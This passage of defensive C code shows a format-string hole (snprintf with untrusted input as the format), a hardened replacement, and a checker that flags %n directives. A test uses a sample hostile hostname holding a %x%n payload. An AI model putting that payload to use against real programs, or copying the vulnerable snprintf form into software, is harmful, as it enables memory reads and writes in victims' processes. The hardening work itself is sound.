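 *     snprintf(out, outlen, untrusted);
 */

/* Hardened form: the untrusted string is only ever a %s argument, so its
 * '%' characters are copied literally. Returns bytes written (not counting
 * the NUL), clamped to what fits in out. */
size_t render_status(char *out, size_t outlen, const char *untrusted)
{
    int n = snprintf(out, outlen, "Connecting to host %s", untrusted);
    if (n < 0 || outlen == 0)
        return 0;
    return (size_t)n < outlen ? (size_t)n : outlen - 1;
}

/* Input-side check for strings that should be pure data (hostnames, URIs):
 * counts conversion directives and flags "%n", which is never legitimate
 * in such data. "%%" is a literal percent sign and does not count. */
int count_format_directives(const char *s, int *has_percent_n)
{
    int count = 0;
    *has_percent_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {               /* "%%": escaped percent */
            p++;
            continue;
        }
        count++;
        const char *q = p + 1;           /* skip flags, width, precision, length */
        while (*q && strchr("-+ #0123456789.*hlLqjzt", *q))
            q++;
        if (*q == '\0')
            break;                       /* dangling '%' at end of string */
        if (*q == 'n')
            *has_percent_n = 1;
        p = q;                           /* the loop's p++ steps past the conversion */
    }
    return count;
}

int main(void)
{
    char buf[64];
    int has_n = 0;
    const char *hostile = "evil.example%x%n";   /* constructed sample input */
    render_status(buf, sizeof buf, hostile);
    printf("%s\n", buf);                        /* the %x%n appear literally */
    printf("directives=%d has_%%n=%d\n",
           count_format_directives(hostile, &has_n), has_n);
    return 0;
}
```

Building with -Wformat -Wformat-security (GCC and Clang) reports the vulnerable shape at compile time, since the format is a non-literal with no further arguments; the data-side check is the complementary control for strings that arrive from a VNC server or a URI handler and are logged or displayed later.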



